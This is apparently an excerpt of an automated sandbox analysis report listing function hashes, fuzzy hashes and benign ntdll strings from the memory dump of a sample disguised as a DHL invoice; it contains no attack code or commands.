Opcode ID: c1fe28d2b99599f70fe9b16ebd98ffdfbd128d642cd65cc2bf81b3ea4870f6a7
Instruction ID: a4395eca186dcfcdb02681973f7e5a5c1c35abecee95c5607ea0550c59f9c09c
Opcode Fuzzy Hash: c1fe28d2b99599f70fe9b16ebd98ffdfbd128d642cd65cc2bf81b3ea4870f6a7
Instruction Fuzzy Hash: 3AD0223222603093CB289695A800F63AA09EBC1AD0F0A002C380EE3800C0048C42C2E0

Uniqueness

Uniqueness Score: -1.00%

Function 0197A830 Relevance: .0, Instructions: 14COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1532555059.0000000001910000.00000040.00001000.00020000.00000000.sdmp, Offset: 01910000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1910000_DHL Factura Electronica Pendiente documento No 04BB25083.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 950ff3e2fa24c389401d46e2ae40292d2d63fe10973766e9e1870c80e88d3a0a
Instruction ID: 302f54043d78046d8abbcc0980d31e0e20f78a7cc38966ca9130932ee5db6d07
Opcode Fuzzy Hash: 950ff3e2fa24c389401d46e2ae40292d2d63fe10973766e9e1870c80e88d3a0a
Instruction Fuzzy Hash: F6D012371E054DBBCB11DF66DC01F957BA9E7A4BA0F444020B908875A0C63AE950D684

Uniqueness

Uniqueness Score: -1.00%

Function 0197CA24 Relevance: .0, Instructions: 14COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1532555059.0000000001910000.00000040.00001000.00020000.00000000.sdmp, Offset: 01910000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1910000_DHL Factura Electronica Pendiente documento No 04BB25083.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0cdde8f58cb8fb0c454eacec4b254e28c0a0e31907c0e8d01e5514d6b7105409
Instruction ID: 2c5a947b068a194748fdc8da4be9989c03f3b8ce43442a9cf28a2c9716b8f246
Opcode Fuzzy Hash: 0cdde8f58cb8fb0c454eacec4b254e28c0a0e31907c0e8d01e5514d6b7105409
Instruction Fuzzy Hash: E1D0A734515402DBDF1FEF08CA50E6E3F79FF14A82B40006CEB0851020E328DD01C710

Uniqueness

Uniqueness Score: -1.00%

Function 019502A0 Relevance: .0, Instructions: 13COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1532555059.0000000001910000.00000040.00001000.00020000.00000000.sdmp, Offset: 01910000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1910000_DHL Factura Electronica Pendiente documento No 04BB25083.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 153dea5617c300a23885095067624b68861a72d9651cf20dee72da6dc6a95444
Instruction ID: 5e4d49e1d32f10e8ee0f6ebf078602efb0083fcbe66ed794212c16eaed937bc8
Opcode Fuzzy Hash: 153dea5617c300a23885095067624b68861a72d9651cf20dee72da6dc6a95444
Instruction Fuzzy Hash: 1FD0C935612E80CFD76BCB0CC5A4F1573B8BB44B85FC90890F809CBB22D66CD944CA40

Uniqueness

Uniqueness Score: -1.00%

Function 0197C700 Relevance: .0, Instructions: 12COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1532555059.0000000001910000.00000040.00001000.00020000.00000000.sdmp, Offset: 01910000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1910000_DHL Factura Electronica Pendiente documento No 04BB25083.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a4bbd7c5c996c6314633515492723e329d7ccf5f4dcb798370ffde6045762c53
Instruction ID: 885398c4010adaa390e4779d68ce2139ed00fb43aa47458574604fdbac6bf410
Opcode Fuzzy Hash: a4bbd7c5c996c6314633515492723e329d7ccf5f4dcb798370ffde6045762c53
Instruction Fuzzy Hash: 9BC01232150644AFC711DA95CD01F0177A9E798B40F000021F60447570C531E910D644

Uniqueness

Uniqueness Score: -1.00%

Function 01960310 Relevance: .0, Instructions: 11COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1532555059.0000000001910000.00000040.00001000.00020000.00000000.sdmp, Offset: 01910000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1910000_DHL Factura Electronica Pendiente documento No 04BB25083.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b20a69916aee968c3675073d0381efa581de60bf3984a7ac555cf611b84c4bee
Instruction ID: 882bee54450451e8c3068ae5d15c2fe433ee967b5a5393c6260ad1192a8df49c
Opcode Fuzzy Hash: b20a69916aee968c3675073d0381efa581de60bf3984a7ac555cf611b84c4bee
Instruction Fuzzy Hash: 37D01236100289EFCB05DF41C890D9A772AFBD8710F148019FD19076108A31ED62DA50

Uniqueness

Uniqueness Score: -1.00%

Function 01940750 Relevance: .0, Instructions: 9COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1532555059.0000000001910000.00000040.00001000.00020000.00000000.sdmp, Offset: 01910000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1910000_DHL Factura Electronica Pendiente documento No 04BB25083.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8541d5aa43a0a658d79fe6471d8132b1696e53b2ec5469e0c5791f15c56add93
Instruction ID: 9da913adf343b8a1c8835a8e70ed330772716711c340ab11fcb84695f77e594b
Opcode Fuzzy Hash: 8541d5aa43a0a658d79fe6471d8132b1696e53b2ec5469e0c5791f15c56add93
Instruction Fuzzy Hash: 5EC04C757015418FCF15DB1ED294F5577F4F744741F150890E849DB721E624E901CA10

Uniqueness

Uniqueness Score: -1.00%

Function 01A14DAD Relevance: .0, Instructions: 6COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1532555059.0000000001910000.00000040.00001000.00020000.00000000.sdmp, Offset: 01910000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1910000_DHL Factura Electronica Pendiente documento No 04BB25083.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 648f2a62eeaad2cdbbcd5344c2cdf0ddb4d308a711b0010c13bd86b66eb1983f
Instruction ID: a88772c7ab1f442141979c665a529fb07c3abbc37231859259e7a7fb319fdcf8
Opcode Fuzzy Hash: 648f2a62eeaad2cdbbcd5344c2cdf0ddb4d308a711b0010c13bd86b66eb1983f
Instruction Fuzzy Hash: 03B01232212545CFC7026720CB00B1832ADBF417C0F0900F0650489830D6188910E501

Uniqueness

Uniqueness Score: -1.00%

Function 01984340 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1532555059.0000000001910000.00000040.00001000.00020000.00000000.sdmp, Offset: 01910000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1910000_DHL Factura Electronica Pendiente documento No 04BB25083.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4ddbdb021037fff1f2c60af7fa68926c86803bd5d82f5966653552a170f73183
Instruction ID: 15c7acd5b11d570d21730cb526b25bf147317087646aa8a304196ea5d89f5723
Opcode Fuzzy Hash: 4ddbdb021037fff1f2c60af7fa68926c86803bd5d82f5966653552a170f73183
Instruction Fuzzy Hash: BE900231606904129640715C48885468049A7E1301B55C015E0468554CCA198A565365

Uniqueness

Uniqueness Score: -1.00%

Function 01984650 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1532555059.0000000001910000.00000040.00001000.00020000.00000000.sdmp, Offset: 01910000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1910000_DHL Factura Electronica Pendiente documento No 04BB25083.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 695ebc08d1c8f86545aff07bb7c1eb0880e49a7cfadf4e1d1ea0cc72cc4cf066
Instruction ID: e6676f752524245afa074b5e2ad41222c63855ef8001d826f743b435feedeb88
Opcode Fuzzy Hash: 695ebc08d1c8f86545aff07bb7c1eb0880e49a7cfadf4e1d1ea0cc72cc4cf066
Instruction Fuzzy Hash: 16900261602604424640715C4808406A049A7E2301395C119A0598560CC61D8955936D

Uniqueness

Uniqueness Score: -1.00%

Function 01982B80 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1532555059.0000000001910000.00000040.00001000.00020000.00000000.sdmp, Offset: 01910000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1910000_DHL Factura Electronica Pendiente documento No 04BB25083.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d96483a707303aef3b2e71256be1dd7cc35acda7b3c3a606225cf03e33b9c027
Instruction ID: 0169064238cb9647f414b8e03a633741f2e991849ef0932ea8c95676e91afac7
Opcode Fuzzy Hash: d96483a707303aef3b2e71256be1dd7cc35acda7b3c3a606225cf03e33b9c027
Instruction Fuzzy Hash: 1690023120250C02D604715C4808686404997D1301F55C015A6068655ED66A89917235

Uniqueness

Uniqueness Score: -1.00%

Function 01982BA0 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1532555059.0000000001910000.00000040.00001000.00020000.00000000.sdmp, Offset: 01910000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1910000_DHL Factura Electronica Pendiente documento No 04BB25083.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fffb52025e7653f283f9d1cee3a0a2d1a44176f16cab8b662503c2e0948db5f0
Instruction ID: 173327538a0634fc9105b13cd2c96b1f99a6d4ee75db0bf738a41889455fbe50
Opcode Fuzzy Hash: fffb52025e7653f283f9d1cee3a0a2d1a44176f16cab8b662503c2e0948db5f0
Instruction Fuzzy Hash: 3390023160650C02D650715C4418746404997D1301F55C015A0068654DC75A8B5577A5

Uniqueness

Uniqueness Score: -1.00%

Function 01982BE0 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1532555059.0000000001910000.00000040.00001000.00020000.00000000.sdmp, Offset: 01910000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1910000_DHL Factura Electronica Pendiente documento No 04BB25083.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 145335202b7644b2a359fee8c20a83a8a0ead51d7f3e19eeac8537f5dc04c165
Instruction ID: 0d111851fa7defb2a97189bc28d3caf752fb00978e9f8c7af448f26eb5892192
Opcode Fuzzy Hash: 145335202b7644b2a359fee8c20a83a8a0ead51d7f3e19eeac8537f5dc04c165
Instruction Fuzzy Hash: 1890023120654C42D640715C4408A46405997D1305F55C015A00A8694DD62A8E55B765

Uniqueness

Uniqueness Score: -1.00%

Function 01982AB0 Relevance: .0, Instructions: 4COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1532555059.0000000001910000.00000040.00001000.00020000.00000000.sdmp, Offset: 01910000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1910000_DHL Factura Electronica Pendiente documento No 04BB25083.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7c3603e315a3efe61741351360e28b42f59770493122479cbccf746ff1bc8752
Instruction ID: 3457a98bafde07c091218c243709e8452e9c68136044e78399e2d2eeca1d8db0
Opcode Fuzzy Hash: 7c3603e315a3efe61741351360e28b42f59770493122479cbccf746ff1bc8752
Instruction Fuzzy Hash: 8D9002A1202644924A00B25C8408B0A854997E1201B55C01AE1098560CC52A89519239

Uniqueness

Uniqueness Score: -1.00%

Function 01982AF0 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1532555059.0000000001910000.00000040.00001000.00020000.00000000.sdmp, Offset: 01910000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1910000_DHL Factura Electronica Pendiente documento No 04BB25083.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fa49ae86cead1630175447be0955127b0cca027230010367f62603c741d372a2
Instruction ID: e2d5a1a6a13c2f335221cde8566fb97f36db5d0d00211575453c563934e37fc5
Opcode Fuzzy Hash: fa49ae86cead1630175447be0955127b0cca027230010367f62603c741d372a2
Instruction Fuzzy Hash: 9E900225222504020645B55C060850B4489A7D7351395C019F145A590CC62689655325

Uniqueness

Uniqueness Score: -1.00%

Function 01982DB0 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1532555059.0000000001910000.00000040.00001000.00020000.00000000.sdmp, Offset: 01910000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1910000_DHL Factura Electronica Pendiente documento No 04BB25083.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 11c8b6be647d3e2100ff7e97cb0a068accfe07c91dc1e2d639c2d323008cf3b1
Instruction ID: 21c6acc9ac5f16c626464969d4fbeea964de491e45d24198618eda2edfe7ec4a
Opcode Fuzzy Hash: 11c8b6be647d3e2100ff7e97cb0a068accfe07c91dc1e2d639c2d323008cf3b1
Instruction Fuzzy Hash: 8C90023124250802D641715C4408606404DA7D1241F95C016A0468554EC65A8B56AB65

Uniqueness

Uniqueness Score: -1.00%

Function 01982D00 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1532555059.0000000001910000.00000040.00001000.00020000.00000000.sdmp, Offset: 01910000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1910000_DHL Factura Electronica Pendiente documento No 04BB25083.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9e1739d064af110382d7bd7f9d25da0b40217d8f04656dc74f45d42a9fa34675
Instruction ID: 496ba9f708576c881c20d3fae045fbb1ea0ef6adaf4138e04b8d6460f18f5096
Opcode Fuzzy Hash: 9e1739d064af110382d7bd7f9d25da0b40217d8f04656dc74f45d42a9fa34675
Instruction Fuzzy Hash: 8490022120654842D600755C540CA06404997D1205F55D015A10A8595DC63A8951A235

Uniqueness

Uniqueness Score: -1.00%

Function 01982CC0 Relevance: .0, Instructions: 4COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1532555059.0000000001910000.00000040.00001000.00020000.00000000.sdmp, Offset: 01910000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1910000_DHL Factura Electronica Pendiente documento No 04BB25083.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 11a993caac701af5e63f7048958689c1e72c9bd6f5dea3bdf91c34cf520d5240
Instruction ID: b5f623617930c263f7806f982d2494613faaad15cea089765b15208676f337e3
Opcode Fuzzy Hash: 11a993caac701af5e63f7048958689c1e72c9bd6f5dea3bdf91c34cf520d5240
Instruction Fuzzy Hash: 0D90022160650802D640715C541C706405997D1201F55D015A0068554DC65E8B5567A5

Uniqueness

Uniqueness Score: -1.00%

Function 01982CF0 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1532555059.0000000001910000.00000040.00001000.00020000.00000000.sdmp, Offset: 01910000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1910000_DHL Factura Electronica Pendiente documento No 04BB25083.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: afb08cc5455f3bf5f7661182dd52bd09a8c7fd1c7c9fe7b8ab80cfd5ed57478b
Instruction ID: e9903794a9a480cb896340374a5dc7c194dadf1083ef84ccf4471578e959c331
Opcode Fuzzy Hash: afb08cc5455f3bf5f7661182dd52bd09a8c7fd1c7c9fe7b8ab80cfd5ed57478b
Instruction Fuzzy Hash: 5690023120250803D600715C550C707404997D1201F55D415A0468558DD65B89516225

Uniqueness

Uniqueness Score: -1.00%

Function 01982C60 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1532555059.0000000001910000.00000040.00001000.00020000.00000000.sdmp, Offset: 01910000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1910000_DHL Factura Electronica Pendiente documento No 04BB25083.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8500e2feb4f18526b734164136c5ee95a16bf6d5d44034bf3c0190f9580bfeae
Instruction ID: 08d960f7ac365a818951149621c77d15453d3692c835dcf1a7ab7d4c520b887a
Opcode Fuzzy Hash: 8500e2feb4f18526b734164136c5ee95a16bf6d5d44034bf3c0190f9580bfeae
Instruction Fuzzy Hash: 6990023120250C42D600715C4408B46404997E1301F55C01AA0168654DC61AC9517625

Uniqueness

Uniqueness Score: -1.00%

Function 01982FA0 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1532555059.0000000001910000.00000040.00001000.00020000.00000000.sdmp, Offset: 01910000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1910000_DHL Factura Electronica Pendiente documento No 04BB25083.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 027af7b843b52d92152b4b210eef3ddbdc50c95c5ed8269ed6fbbc1bfd342f9f
Instruction ID: e890f903d4b607e7d49825edff591b58f1bc00d5449cae06ba5184fa47a9af10
Opcode Fuzzy Hash: 027af7b843b52d92152b4b210eef3ddbdc50c95c5ed8269ed6fbbc1bfd342f9f
Instruction Fuzzy Hash: 6190023120290802D600715C480C747404997D1302F55C015A51A8555EC66AC9916635

Uniqueness

Uniqueness Score: -1.00%

Function 01982F60 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1532555059.0000000001910000.00000040.00001000.00020000.00000000.sdmp, Offset: 01910000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1910000_DHL Factura Electronica Pendiente documento No 04BB25083.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 640a48c9910c74a430f2bfbad92b2ebaefc4fefb4b82e6cdf1d64e296a8218f2
Instruction ID: 678ec15efd0fe428a1bf19fe8f89cc460a6b9a936cb4dca33afc8a346bfb8a0c
Opcode Fuzzy Hash: 640a48c9910c74a430f2bfbad92b2ebaefc4fefb4b82e6cdf1d64e296a8218f2
Instruction Fuzzy Hash: F490026121250442D604715C4408706408997E2201F55C016A2198554CC52E8D615229

Uniqueness

Uniqueness Score: -1.00%

Function 01982EE0 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1532555059.0000000001910000.00000040.00001000.00020000.00000000.sdmp, Offset: 01910000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1910000_DHL Factura Electronica Pendiente documento No 04BB25083.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cd9c3ac54b7e8debbda896d21ea7c8c5aa3588a7e39ecf87a38c298ab2e104be
Instruction ID: 89dc8afa898a7d7a9c4117e99b9a9157db9290c8a814b727e0e409dcb19e3ad9
Opcode Fuzzy Hash: cd9c3ac54b7e8debbda896d21ea7c8c5aa3588a7e39ecf87a38c298ab2e104be
Instruction Fuzzy Hash: 6D90026120290803D640755C4808607404997D1302F55C015A20A8555ECA2E8D516239

Uniqueness

Uniqueness Score: -1.00%

Function 01982E30 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1532555059.0000000001910000.00000040.00001000.00020000.00000000.sdmp, Offset: 01910000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1910000_DHL Factura Electronica Pendiente documento No 04BB25083.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d33b116caec23ef52018c3b63203c760e4c01ccea5a51dcde48a99424eba862b
Instruction ID: 7d4aa8072f8991027eb19367de1b94265cfb7171595446c6ca9537d4e3897c01
Opcode Fuzzy Hash: d33b116caec23ef52018c3b63203c760e4c01ccea5a51dcde48a99424eba862b
Instruction Fuzzy Hash: 1390022130250802D602715C4418606404DD7D2345F95C016E1468555DC62A8A53A236

Uniqueness

Uniqueness Score: -1.00%

Function 01983090 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1532555059.0000000001910000.00000040.00001000.00020000.00000000.sdmp, Offset: 01910000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1910000_DHL Factura Electronica Pendiente documento No 04BB25083.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e6308cebcc6b9992b91eb5660421cb02637a2daf5b5db241aac93d7bf8eec07a
Instruction ID: 404ee5d7bfb28afae1f515282ec67c55da9306a52ae85912293b97c2356f1636
Opcode Fuzzy Hash: e6308cebcc6b9992b91eb5660421cb02637a2daf5b5db241aac93d7bf8eec07a
Instruction Fuzzy Hash: 3490022124250C02D640715C8418707404AD7D1601F55C015A0068554DC61B8A6567B5

Uniqueness

Uniqueness Score: -1.00%

Function 01983010 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1532555059.0000000001910000.00000040.00001000.00020000.00000000.sdmp, Offset: 01910000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1910000_DHL Factura Electronica Pendiente documento No 04BB25083.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8b3b2471d02ad810f10b33d3ce0dea29d1d5f9c81f5bceb0606fd2c79225ac03
Instruction ID: e94fa8547aa8d8f08af2ddd6542439c5f4e2006ff09a683e7ff62dff8785f56d
Opcode Fuzzy Hash: 8b3b2471d02ad810f10b33d3ce0dea29d1d5f9c81f5bceb0606fd2c79225ac03
Instruction Fuzzy Hash: F790022120294842D640725C4808B0F814997E2202F95C01DA419A554CC91A89555725

Uniqueness

Uniqueness Score: -1.00%

Function 019835C0 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1532555059.0000000001910000.00000040.00001000.00020000.00000000.sdmp, Offset: 01910000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1910000_DHL Factura Electronica Pendiente documento No 04BB25083.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c0c939a93c28b8e75feb20c56ecad97798810c0564ebd9198a77f6635aa1a648
Instruction ID: 557956d374679bc0f0bbbf64abfedf452f7dee8df8cd1024f2f95341178e4442
Opcode Fuzzy Hash: c0c939a93c28b8e75feb20c56ecad97798810c0564ebd9198a77f6635aa1a648
Instruction Fuzzy Hash: 5A90023160660802D600715C4518706504997D1201F65C415A0468568DC79A8A5166A6

Uniqueness

Uniqueness Score: -1.00%

Function 019839B0 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1532555059.0000000001910000.00000040.00001000.00020000.00000000.sdmp, Offset: 01910000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1910000_DHL Factura Electronica Pendiente documento No 04BB25083.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 115e87ef8a22753ddf0204e63fd66d62fd4ac006795c915f651651ebe92909d0
Instruction ID: 178454be628e69beb4db45428f73ee3f94ab0c5cb45cf3098d55223adf341a87
Opcode Fuzzy Hash: 115e87ef8a22753ddf0204e63fd66d62fd4ac006795c915f651651ebe92909d0
Instruction Fuzzy Hash: 7C90022124655502D650715C44086168049B7E1201F55C025A0858594DC55A89556325

Uniqueness

Uniqueness Score: -1.00%

Function 01983D10 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1532555059.0000000001910000.00000040.00001000.00020000.00000000.sdmp, Offset: 01910000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1910000_DHL Factura Electronica Pendiente documento No 04BB25083.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2ef60cc94c2bf41323400bd2fd445598e074cc4fb917c84344ea61e490401721
Instruction ID: 0ea4412de5017c651c59a66909f20a1b42b865173f0a2a71bb02fc852feeb4a8
Opcode Fuzzy Hash: 2ef60cc94c2bf41323400bd2fd445598e074cc4fb917c84344ea61e490401721
Instruction Fuzzy Hash: 02900231203505429A40725C5808A4E814997E2302B95D419A0059554CC91989615325

Uniqueness

Uniqueness Score: -1.00%

Function 01983D70 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1532555059.0000000001910000.00000040.00001000.00020000.00000000.sdmp, Offset: 01910000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1910000_DHL Factura Electronica Pendiente documento No 04BB25083.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5b80c6a1509e88832c5898ca82ffdd8bcf71ae9badf3c83b8403b8dfb47c2d01
Instruction ID: f769d972d6dbd4f0219a4a09b437c9211457dec019ddee9a7a6027b6b2f50d5f
Opcode Fuzzy Hash: 5b80c6a1509e88832c5898ca82ffdd8bcf71ae9badf3c83b8403b8dfb47c2d01
Instruction Fuzzy Hash: 4C90023520250802DA10715C5808646408A97D1301F55D415A0468558DC65989A1A225

Uniqueness

Uniqueness Score: -1.00%

Function 01982C00 Relevance: .0, Instructions: 2COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1532555059.0000000001910000.00000040.00001000.00020000.00000000.sdmp, Offset: 01910000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1910000_DHL Factura Electronica Pendiente documento No 04BB25083.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
Instruction ID: c26a46f40155d0af60f41735fc008435baf0626200742d2b07df4f600b439870
Opcode Fuzzy Hash: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
Instruction Fuzzy Hash:

Uniqueness

Uniqueness Score: -1.00%

Function 01982890 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 190COMMON

Download Yara Rule

APIs

___swprintf_l.LIBCMT ref: 0198293C
___swprintf_l.LIBCMT ref: 0198295E
___swprintf_l.LIBCMT ref: 019829A3
___swprintf_l.LIBCMT ref: 019BA52E

Strings

ffff:, xrefs: 019BA504
:%u.%u.%u.%u, xrefs: 019BA5B8
::ffff:0:%u.%u.%u.%u, xrefs: 019BA54E
::%hs%u.%u.%u.%u, xrefs: 019BA527

Memory Dump Source

Source File: 00000005.00000002.1532555059.0000000001910000.00000040.00001000.00020000.00000000.sdmp, Offset: 01910000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1910000_DHL Factura Electronica Pendiente documento No 04BB25083.jbxd

Similarity

API ID: ___swprintf_l
String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
API String ID: 48624451-2108815105
Opcode ID: b8905a6b86698fa9d1a5f658e03e25706355d167ec257ff177edf528c8e43843
Instruction ID: 390d1a32aab457465cdb5ae54ecb711d8e1bf31f59bb65c8478bce4d04e9a6b4
Opcode Fuzzy Hash: b8905a6b86698fa9d1a5f658e03e25706355d167ec257ff177edf528c8e43843
Instruction Fuzzy Hash: BA51E6B2A00116BFDF11EF9D898097EFBBCBB492417148229E46DD7641D374DE50C7A0

Uniqueness

Uniqueness Score: -1.00%

Function 019F2410 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 189COMMON

Download Yara Rule

APIs

___swprintf_l.LIBCMT ref: 019F24A6
___swprintf_l.LIBCMT ref: 019F24E2
___swprintf_l.LIBCMT ref: 019F257D
___swprintf_l.LIBCMT ref: 019F25A3
___swprintf_l.LIBCMT ref: 019F25C8
___swprintf_l.LIBCMT ref: 019F2608

Strings

:%u.%u.%u.%u, xrefs: 019F25FF
::%hs%u.%u.%u.%u, xrefs: 019F249E
ffff:, xrefs: 019F247D, 019F249D
::ffff:0:%u.%u.%u.%u, xrefs: 019F24DA

Memory Dump Source

Source File: 00000005.00000002.1532555059.0000000001910000.00000040.00001000.00020000.00000000.sdmp, Offset: 01910000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1910000_DHL Factura Electronica Pendiente documento No 04BB25083.jbxd

Similarity

API ID: ___swprintf_l
String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
API String ID: 48624451-2108815105
Opcode ID: ab05092538fb9f4825adad3969982f3a25b8cbd642c0ab672d95c800443dc9be
Instruction ID: 555dbddcc55781c2a2806daa82d5c0ac47ce8434ca06aaff7b9179cf276e9c9a
Opcode Fuzzy Hash: ab05092538fb9f4825adad3969982f3a25b8cbd642c0ab672d95c800443dc9be
Instruction Fuzzy Hash: 60510875A04645BFCB30DF9DC890A7FBBFCEB84201B04885DE69EC7641D6B4DA408760

Uniqueness

Uniqueness Score: -1.00%

Function 01977630 Relevance: 14.2, APIs: 1, Strings: 7, Instructions: 194COMMON

Download Yara Rule

Strings

CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 019B46FC
CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 019B4655
CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 019B4725
CLIENT(ntdll): Processing section info %ws..., xrefs: 019B4787
Execute=1, xrefs: 019B4713
ExecuteOptions, xrefs: 019B46A0
CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 019B4742

Memory Dump Source

